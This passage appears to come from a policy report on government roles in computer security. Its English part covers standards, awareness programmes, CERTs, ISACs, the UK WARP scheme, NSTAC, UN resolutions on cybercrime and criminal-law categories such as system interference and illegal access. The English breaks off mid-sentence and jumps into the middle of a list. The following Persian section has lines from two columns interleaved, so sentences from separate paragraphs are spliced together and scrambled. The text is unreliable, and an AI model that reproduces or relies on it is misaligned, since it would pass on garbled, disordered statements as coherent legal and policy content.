Standards: Government is also one of the important decision-makers in setting private sector standards. Standardization is a non-legislative, voluntary, consensus-based process, but government experts can take part in it too, especially if the government supports research on computer security in the public sector.

70 Data Protection Directive
71 National Institute of Standards and Technology

Awareness, education and capacity building: Another non-legislative role of government is public education and cooperation with the private sector to raise awareness of vulnerabilities and of ways to prevent them. Case studies and reports such as those described earlier are among the tools for achieving this. The European Commission has asked its members to
draw up a public education and awareness program that covers the full range of audiences. Presenting the reports and strategies mentioned above to professional bodies is effective in raising awareness. Education also includes scholarships, development programs and raising the level of knowledge of human resources. The European Commission has recommended that member states give computer security greater emphasis in their courses.

Information sharing: Another important role of government is sharing information about computer security vulnerabilities, warning about new viruses and attacks, and providing suggestions for solving problems, security patches[72] and best practices. Government can fund information exchange centers such as Computer Emergency Response Teams (CERT)[73] and the cooperation centers that have been set up around the world. For example, the United States CERT at Carnegie Mellon University is a government research and development center that works to help handle computer security incidents, publish security alerts, research long-term changes in networked systems, and provide training on how to prepare information security plans. Other countries that have a CERT include Malaysia, Japan, Australia and Korea. Mcert is a computer security emergency response center for small and medium-sized companies in Germany; it brings the private and public sectors together through the German ICT association BITKOM, seven industrial sponsors and the country's government.

Multinational structures are gradually emerging for better exchange of information at the regional and trans-regional levels. In June 2001 the European Commission published a treaty on strengthening CERTs in Europe and improving the participation of the executive members of that center. In February 2003 the Commission went a step further and announced its decision to establish the Network and Information Security Agency.[74] APEC took the lead in setting up local CERTs, in in-country training and in developing the capabilities of such centers in the developing countries of the region, and produced CERT guidelines. The G8 has also created a network of permanent points of contact to make cooperation and the exchange of information on electronic crime easier, and governments that are not members of the G8 can now take part in it as well.

In the same way, governments around the world may, in various forms, create institutions in the private sector to run voluntary information sharing systems, such as Information Sharing and Analysis Centers (ISAC).[75] For example, the United States has established ISACs for particular sectors of industry (such as financial services, telecommunications and the electric power industry), and countries such as Canada, Germany, Japan and the Netherlands also have ISACs. The United Kingdom is pursuing the concept of the WARP[76] (Warning, Advice and Reporting Point): a nationwide network for preparing advice and warnings about electronic attacks better and faster, and for receiving incident reports more completely in that country.

Government can also set up private and public committees for better exchange of security information. One example is the National Security Telecommunications Advisory Committee (NSTAC),[77] which is made up of thirty senior representatives of the communications industry, network service providers, information technology companies, and officials responsible for national security and emergency communications systems. NSTAC is also the President's industry adviser on problems of national security and emergency preparedness in communications policy.

72 Security Patches
73 Computer Emergency Response Team
74 Network And Information Security Agency
75 Information Sharing and Analysis Center
76 Warning, Advice & Reporting Point
77 National Security Telecommunication Advisory Committee

Criminal Law

Another way in which government can support private sector systems is "criminal law". International and regional institutions have proposed that every country, as part of the legal framework for improving trust and security in cyberspace, should bring its laws on offences that compromise the confidentiality, integrity or availability of data
into line. The implementing framework of criminal law consists of substantive laws[78] and procedural laws,[79] which derive from privacy concepts that have a specific application in cyberspace and also from field investigations.

The United Nations may be one of the first international organizations to have pointed to the importance of electronic crime. In December 2000 and January 2002 the UN General Assembly adopted resolutions 55/63 and 56/121 on combating the criminal misuse of communications technologies. Resolution 55/63 states that countries must draw up special laws to eliminate safe havens for those who commit electronic crimes. Resolution 55/63 also states that government must take the necessary measures to prevent the criminal misuse of information technology (with international cooperation to prevent the exchange of electronic data). A further recommendation of resolution 55/63 is training on the enforcement of laws concerning electronic crime.

Violation of Substantive Criminal Laws

Various methods of committing electronic crimes are conceivable

viruses that delete files, or that break into a computer and cause data to be altered, or that break into a website and change its appearance, all fall into this category. Identifying the element of "intent" is vital for distinguishing criminal activity from mere ordinary mistakes or the accidental sending of viruses.
• System interference:[82] intentionally and without authorization hindering the functioning of a computer system by inputting, transmitting, damaging, deleting or altering computer data. This provision covers cases such as denial-of-service attacks or introducing a virus into a system in a way that interferes with its normal operation. "Serious harm" is the element that separates criminal activity from ordinary Internet behavior such as sending one or several unsolicited e-mails.
• Illegal access:[83] intentional and unauthorized access to another person's computer system, which in the electronic sphere can be regarded as equivalent to "trespass". (From one
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﻣﺘﻨﺎﺳﺐ ،ﺟﺮﺍﺋ ﹺﻢ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺩﺭ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺭﺍ ﺑـﺪﺗﺮ ﺍﺯ ﺟـﺮﺍﺋﻢ ﭼﺮﺍﻛﻪ ﻓﺮﺳﺘﻨﺪﺓ ﺁﻥ ﺑﺪﻭﻥ ﺍﺟﺎﺯﻩ ﺑﻪ ﺭﺍﻳﺎﻧـﻪ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩ )ﻭ ﻳـﺎ
ﻣﺸﺎﺑﻪ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺟﻠﻮﻩ ﺩﻫﻨﺪ. ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫـﺎﻱ ﭘـﺴﺘﻲ ﮔﻴﺮﻧـﺪﻩ( ﺩﺳﺘﺮﺳـﻲ ﭘﻴـﺪﺍ ﻛـﺮﺩﻩ ﺍﺳـﺖ.
ﺑﺮﺍﺳﺎﺱ ﺍﻳﻦ ﺗﻔـﺴﻴﺮ ،ﻣﻌﺎﻫـﺪﺓ ﺷـﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺟـﺮﺍﺋﻢ
ﻛﺎﺭﺑﺮﺩ ﻣﻔﺎﻫﻴﻢ ﭘﺎﻳﻪﺍﻱ ﻗﺎﻧﻮﻥ ﺟﺰﺍ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﻭﺷﻦ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﻣﻨﻈﻮﺭ ﺍﺯ "ﺑﺪﻭﻥ ﺍﺟـﺎﺯﻩ" ﻫﻤـﺎﻥ
ﻛﺸﻮﺭﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻨﺪ ﻣﻔﺎﻫﻴﻢ ﻣﻌﻤﻮﻝ ﺩﺭ ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﻌﻤﻮﻝ ﻭ ﺫﺍﺗـﻲ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺳـﺖ ﻛـﻪ ﺑﻄـﻮﺭ ﺭﻭﺯﻣـﺮﻩ
ﻣﺎﻧﻨـﺪ "ﻣﻌﺎﻭﻧــﺖ ﺩﺭ ﺟــﺮﻡ" ﻳــﺎ "ﻗـﺼﺪ" ﺭﺍ ﻧﻴــﺰ ﺩﺭ ﺣــﻮﺯﺓ ﺟــﺮﺍﺋﻢ ﻼ ﺍﺭﺳــﺎﻝ ﻧﺎﻣــﻪﻫــﺎﻱ
ﻫﻤــﻮﺍﺭﻩ ﺩﺭ ﺁﻥ ﺍﺗﻔــﺎﻕ ﻣــﻲﺍﻓﺘــﺪ؛ ﻣــﺜ ﹰ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻨـﺪ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﻗـﺎﻧﻮﻥ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺻـﻔﺤﺎﺕ ﻭﺏ ﺍﺯ ﻃﺮﻳـﻖ ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﺟﺮﺍﺋﻢ ﻋﺎﺩﻱ ﻣﻔﻬﻮﻡ "ﻗﺼﺪ ﺗﺨﻠﻒ" ﺭﺍ ﺗﻌﺮﻳـﻒ ﻛـﺮﺩﻩ ﺑﺎﺷـﺪ ،ﺩﺭ ﻣﺴﺘﻘﻴﻢ ﻳﺎ ﻓﺮﺍﻣﺘﻦ ،٨٤ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ cookieﻫـﺎ ﻳـﺎ
ﻣﻮﺭﺩ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﻫﻤﺎﻥ ﻣﻔﻬﻮﻡ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﺩ. botﻫﺎ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﺷﺎﺭﻩ ﻛﺮﺩ.
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻓﺮﺳﺘﺎﺩﻥ ﻳﻚ ﻭﻳﺮﻭﺱ ﺑﻪ ﻗﺼﺪ ﺗﺨﺮﻳﺐ ﺳـﺮﻭﻳﺲ
ﺟﺮﺍﺋﻢ ﺗﺴﻬﻴﻞﺷﺪﻩ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺤﺖ ﻋﻨﻮﺍﻥ "ﺟﺮﻡ" ﻭ ﻳﺎ "ﻗﺼﺪ ﺍﻧﺠﺎﻡ ﺟﺮﻡ" ﻣﻄـﺮﺡ
ﺷﻮﺩ؛ ﺣﺘﻲ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻭﻳﺮﻭﺱ ﺑـﻪ ﺩﺭﺳـﺘﻲ ﻋﻤـﻞ ﻧﻜﻨـﺪ .ﺑـﻪ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻪﺗﻨﻬﺎ ﺷﺎﻣﻞ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﻓﺮﺩ ﻣﺘﺨﻠـﻒ
ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻗﻮﺍﻧﻴﻦ ﻣﻔﻬﻮﻡ "ﻣﻌﺎﻭﻧـﺖ ﺩﺭ ﺟـﺮﻡ" ﺭﺍ ﺑﺮ ﻋﻠﻴﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ ،ﺑﻠﻜﻪ ﺟﺮﺍﺋﻤﻲ ﻛﻪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺗﻌﺮﻳﻒ ﻛﺮﺩﻩ ﺑﺎﺷﻨﺪ ،ﺩﺭ ﺣﻮﺯﻩ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑـﺮ ﻣـﻲﮔﻴـﺮﺩ .ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ
ﻼ ﺍﮔـﺮ ﻛـﺴﻲ ﻫﻤﺎﻥ ﺗﻌﺎﺭﻳﻒ ﺍﺳﺘﻔﺎﺩﻩ ﻛـﺮﺩ ،ﺑﮕﻮﻧـﻪﺍﻱ ﻛـﻪ ﻣـﺜ ﹰ ﺳﺮﻗﺖ ﻭ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺟﺮﺍﺋﻤﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺩﺭ ﺩﻧﻴـﺎﻱ ﺧـﺎﺭﺝ ﺍﺯ
ﺑﺼﻮﺭﺕ ﻋﻤﺪﻱ ﻳﻚ ﻭﻳﺮﻭﺱ ﺗﻮﻟﻴﺪ ﻛﻨـﺪ ،ﺣﺘـﻲ ﺍﮔـﺮ ﻭﻳـﺮﻭﺱ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺗﻤﺎﻣﻲ ﻧﻈﺎﻣﻬﺎﻱ ﺣﻘﻮﻗﻲ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ.
ﺗﻮﺳﻂ ﺷﺨﺺ ﺩﻳﮕـﺮﻱ ﺑـﻪ ﺷـﺒﻜﻪ ﺭﺍﻩ ﻳﺎﻓﺘـﻪ ﺑﺎﺷـﺪ ،ﺑـﺎﺯ ﻫـﻢ ﺍﻣــﺎ ﺳــﺮﻗﺖ ﻭ ﻛﻼﻫﺒــﺮﺩﺍﺭﻱ ﺩﺭ ﺩﻧﻴــﺎﻱ ﺍﻳﻨﺘﺮﻧــﺖ ﻧﻴــﺰ ﺻــﻮﺭﺕ
ﺷﺨﺺ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﻩ ﺩﺭ ﻗﺒـﺎﻝ ﺧﺮﺍﺑﻴﻬـﺎﻳﻲ ﻛـﻪ ﺁﻥ ﻭﻳـﺮﻭﺱ ﺩﺭ ﻣﻲﮔﻴﺮﺩ .ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺗﺨﻠﻔﺎﺗﻲ ﻫﻤﭽﻮﻥ ﺳﺮﻗﺘﻬﺎﻱ ﺍﺩﺑـﻲ ﻭ
ﺩﺍﺩﻩﻫﺎ ﻭ ﺷﺒﻜﻪ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﻣﻘﺼﺮ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ. ﻓﻜﺮﻱ ﻳﺎ ﺍﻧﺘﺸﺎﺭ ﺗﺼﺎﻭﻳﺮ ﻣﺒﺘﺬﻝ ﺍﺯ ﻛﻮﺩﻛﺎﻥ ﻧﻴﺰ ﻣﺤﺪﻭﺩ ﺑﻪ ﺟﺮﺍﺋﻢ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻤﻲﺷﻮﻧﺪ ،ﺑﻠﻜﻪ ﺗﺨﻠﻔﺎﺗﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ ،ﻣﺠﺎﺯﺍﺗﻬـﺎﻱ ﺟـﺮﺍﺋﻢ
ﺗﻮﺟﻪ ﺑﻪ ﺟﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻏﺎﻟﺒﹰﺎ ﻣﻨﺠﺮ ﺑﻪ ﭘﺪﻳﺪ ﺁﻣﺪﻥ ﺳﺆﺍﻻﺗﻲ ﻣﻮﺟﻮﺩ ،ﺑﺮﺍﻱ ﺟﺮﺍﺋﻢ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻧﻴﺰ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ .ﺗﺤﻠﻴـﻞ ﺩﻗﻴـﻖ
ﻼ ﺍﻳﻨﻜﻪ ﺿﻮﺍﺑﻄﻲ ﻛﻪ ﺩﻭﻟﺖ ﺑـﺮ ﻣﺒﻨـﺎﻱ ﺁﻧﻬـﺎ ﺣـﻖ ﻣﻲﺷﻮﺩ ،ﻣﺜ ﹰ ﻋﻮﺍﻣﻞ ﻣﺨﺘﻠﻒ ﺍﻳﻨﮕﻮﻧﻪ ﺟﺮﺍﺋﻢ ﻣﺴﺘﻠﺰﻡ ﺑﺮﺭﺳﻲ ﺗﻄﺒﻴﻘﻲ ﻗـﻮﺍﻧﻴﻦ
ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﭘﻴـﺪﺍ ﺟﻨﺎﻳﻲ ﻣﻮﺟﻮﺩ ﺩﺭ ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺍﺳـﺖ ،ﻭ ﺩﺭ ﺍﻳـﻦ
ﻣﻲﻛﻨﺪ -ﺩﺍﺩﻩﻫﺎﻳﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺷـﻮﺍﻫﺪﻱ ﺑـﺮ ﺍﻧﺠـﺎﻡ ﺟـﺮﺍﺋﻢ ﺭﺍﺳﺘﺎ ﻗﺎﺋﻞ ﺷﺪﻥ ﺗﻔﺎﻭﺕ ﻣﻴﺎﻥ ﺗﺨﻠﻔﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺟﺮﺍﺋﻤﻲ ﻛـﻪ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺗﺨﻠﻔﺎﺕ ﺑﺎﺷﻨﺪ -ﻛﺪﺍﻣﻨﺪ؟ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ ﻧﻴﺰ ﺿﺮﻭﺭﻱ ﻣﻲﺑﺎﺷﺪ.
ﻛﺸﻮﺭﻫﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻗﺎﻧﻮﻧﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﺩﻭﻟـﺖ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﺑﻨﺪﻫﺎﻱ ۷ﺗﺎ ۱۰ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺍﺯ ﺍﻳـﻦ ﻣﻔﻬـﻮﻡ ﻓﺎﺻـﻠﻪ
ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨـﺪ .ﺍﻳـﻦ ﺭﻭﺍﻟﻬـﺎ ﻣﻲﮔﻴﺮﺩ ﻭ ﺑﺼﻮﺭﺕ ﻛﻠﻲﺗﺮ ﺩﺭ ﻣﻮﺭﺩ ﺟﺮﺍﺋﻤﻲ ﺻـﺤﺒﺖ ﻣـﻲﻛﻨـﺪ
ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺩﺳــﺘﻮﺭﺍﺕ ﻗــﻀﺎﻳﻲ ﺑــﺮﺍﻱ ﺑﺮﺭﺳــﻲ ﺩﺍﺩﻩﻫــﺎﻱ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻤﻨﻈﻮﺭ ﺗﺴﻬﻴﻞ ﺍﻧﺠﺎﻡ ﺁﻧﭽﻪ ﻛﻪ ﺧـﺎﺭﺝ
ﺫﺧﻴﺮﻩﺷﺪﻩ ﻭ ﻳﺎ ﺣﻜﻢ ﺗﺼﺮﻑ ﻭ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺍﺯ ﻓﻀﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺰ ﺟﺮﻡ ﺗﻠﻘﻲ ﻣﻲﺷﻮﺩ ﻣـﻲﭘـﺮﺩﺍﺯﺩ )ﻛﺎﺭﻫـﺎﻳﻲ
ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎﺷﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ ﺍﺟـﺎﺯﻩ ﭼﻮﻥ ﺟﻌﻞ ،ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ،ﺗﻮﺯﻳﻊ ،ﺗﻮﻟﻴﺪ ﻳﺎ ﺩﺍﺷﺘﻦ ﺗﺼﺎﻭﻳﺮ ﻣﺒﺘﺬﻝ ﺍﺯ ﻛﻮﺩﻛﺎﻥ
ﺭﺩﻳــﺎﺑﻲ ﺑﻼﺩﺭﻧــﮓ ٨٥ﺍﺭﺗﺒﺎﻃــﺎﺕ ﻭ ﺩﺍﺩﻩﻫــﺎﻱ ﺍﻧﺘﻘــﺎﻟﻲ ﺭﺍ -ﻛــﻪ ﻭ ﻧﻘﺾ ﺣﻘﻮﻕ ﭘﺪﻳﺪﺁﻭﺭﻧﺪﺓ ﻳﻚ ﺍﺛﺮ( .ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺑﺮﺧﻲ ﻧﻈﺎﻣﻬﺎﻱ
ﻧﺸﺎﻧﺪﻫﻨﺪﺓ ﻣﺒﺪﺃ ﻭ ﻣﻘﺼﺪ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺍﺳﺖ -ﻣـﻲﺩﻫﻨـﺪ .ﺑﺨـﺶ ﺣﻘﻮﻗﻲ ،ﺑﻜﺎﺭﮔﻴﺮﻱ ﺿﻮﺍﺑﻂ ﺧﺎﺹ ﺑﺮﺍﻱ ﺟﺮﺍﺋﻤـﻲ ﻛـﻪ ﺑﻮﺳـﻴﻠﺔ
ﻣﻬﻤﻲ ﺍﺯ ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺟـﺮﺍﺋﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ، ﺭﺍﻳﺎﻧﻪ ﺗﺴﻬﻴﻞ ﻣﻲﺷﻮﻧﺪ ﻏﻴﺮﺿـﺮﻭﺭﻱ ﺑﺎﺷـﺪ .ﻫﻤﭽﻨـﻴﻦ ﻣﻤﻜـﻦ
ﺩﻭﻟﺘﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﻣـﻲﻛﻨـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺗﺤﻘﻴـﻖ ﻭ ﺭﺩﻳـﺎﺑﻲ ﺍﺳـﻨﺎﺩ ﺍﺳﺖ ﺍﻳﻦ ﻗـﻮﺍﻧﻴﻦ ﺑـﺎ ﺩﺭﻧﻈـﺮ ﮔـﺮﻓﺘﻦ ﻣﺠﺎﺯﺍﺗﻬـﺎﻱ ﻧـﻪﭼﻨـﺪﺍﻥ
ﺩﺭ ﻫﻤﻴﻦ ﺭﺍﺳﺘﺎ ﻣﻌﺎﻫﺪﺓ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺻﺮﺍﺣﺘﹰﺎ ﻋﻨﻮﺍﻥ ﻣﻲﻛﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﺭﺩﻳﺎﺑﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ،ﻭ ﮔﺰﺍﺭﺵ ﻫﺮ ﻧﻮﻉ ﺛﺒﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ
ﻧﻈﺎﺭﺕ ﺑﺮ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺑﺮﺭﺳﻲ ﺩﺍﺩﻩﻫﺎﻱ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺗـﺎ ﺣـﺪﻱ ﺩﻭﻟﺖ ﺍﺯ ﻗﻮﺍﻧﻴﻦ ﻭﻳﮋﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
ﻣﺠﺎﺯ ﺍﺳﺖ ﻛﻪ ﻃﺒﻖ ﺗﻌﺮﻳﻒ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺩﺭ ﻣﻨﺸﻮﺭ ﺣﻘـﻮﻕ ﮔﺰﺍﺭﺷﮕﻴﺮﻱ ﺍﺟﺒﺎﺭﻱ ﺍﺯ ﺩﺍﺩﻩﻫـﺎﻱ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ
ﺑــﺸﺮ ﺍﺭﻭﭘــﺎﻳﻲ ﺁﻧــﺮﺍ ﻧﻘــﺾ ﻧﻜﻨــﺪ .ﺑﻨــﺪ ۱۵ﻣﻌﺎﻫــﺪﺓ ﺟــﺮﺍﺋﻢ ﺭﺩﻳﺎﺑﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ ﺗﻮﺳـﻂ ﺩﻭﻟـﺖ ﻣﻨﺠـﺮ ﺑـﻪ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺣﺎﻭﻱ ﻧﻜﺎﺕ ﺯﻳﺮ ﺍﺳﺖ: ﻧﻘﺾ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﻓﺮﺍﺩ ﻣﻲﺷﻮﺩ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻧﻴﺎﺯ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ
ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨـﺪ ﻛـﻪ ﺑـﻪ ﺗـﺪﻭﻳﻦ، .۱ ﺍﺯ ﺭﻭﺍﻟﻬــﺎﻱ ﻣﺤــﺎﻓﻈﺘﻲ ﺑــﻴﺶ ﺍﺯ ﭘــﻴﺶ ﺍﺣــﺴﺎﺱ ﻣــﻲﮔــﺮﺩﺩ.
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭ ﻛـﺎﺭﺑﺮﺩ ﺍﻳـﻦ ﺭﻭﺍﻟﻬـﺎ ﺩﺭ ﺿـﻮﺍﺑﻂ ﻭ ﻗـﻮﺍﻧﻴﻦ ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ OECDﺩﺭ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺧﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴـﺖ
ﻣﺤﻠﻲ -ﻛﻪ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺣﻔﺎﻇـﺖ ﻣﻨﺎﺳـﺐ ﺍﺯ ﺣﻘـﻮﻕ ﻭ ﺷﺒﻜﻪ ﻫﺎ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺍﻇﻬﺎﺭ ﻣـﻲﻛﻨـﺪ" :ﻣﻌﻴﺎﺭﻫـﺎﻱ
ﺁﺯﺍﺩﻳﻬﺎﻱ ﺑﺸﺮ ،ﺍﺯ ﺟﻤﻠﻪ ﺣﻘﻮﻕ ﻣﺬﻛﻮﺭ ﺩﺭ ﻣﻘـﺮﺭﺍﺕ ﺳـﺎﻝ ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﻧﺪ ﻛﻪ ﺩﺭ ﺭﺍﺳﺘﺎﻱ ﺍﺭﺯﺷﻬﺎﻱ
۱۹۵۰ﻛﻨﻮﺍﻧﺴﻴﻮﻥ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ ﺑﺮﺍﻱ ﺣﻔﻆ ﺣﻘﻮﻕ ﺑـﺸﺮ، ﻣﺸﺨﺺﺷـﺪﻩ ﺍﺯ ﻃـﺮﻑ ﺟﻮﺍﻣـﻊ ﺩﻣﻮﻛﺮﺍﺗﻴـﻚ ﺍﺯ ﺟﻤﻠـﻪ ﺁﺯﺍﺩﻱ
ﺁﺯﺍﺩﻳﻬﺎﻱ ﺍﺳﺎﺳﻲ ﻭ ﺳﺎﻳﺮ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺣﻤﺎﻳﺖ ﺍﺯ ﺣﻘﻮﻕ ﺑﺸﺮ ﺗﺒﺎﺩﻝ ﺍﻓﻜﺎﺭ ﻭ ﺍﻳﺪﻩﻫﺎ ،ﺟﺮﻳﺎﻥ ﺁﺯﺍﺩ ﺍﻃﻼﻋـﺎﺕ ،ﻣﺤﺮﻣﺎﻧـﻪ ﺑـﻮﺩﻥ
ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ،ﺗﻬﻴﻪ ﺷﺪﻩﺍﻧﺪ -ﺗﻮﺟﻪ ﻻﺯﻡ ﻛﺮﺩﻩ ﺍﺳﺖ. ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ،ﺣﻔﺎﻇﺖ ﻣﻨﺎﺳﺐ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ،ﻭ
ﺷﻔﺎﻓﻴﺖ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ".ﻛﻤﻴﺴﻴﻮﻥ ﺍﺭﻭﭘﺎ ﺍﻳﻨﮕﻮﻧﻪ ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ ﻛﻪ
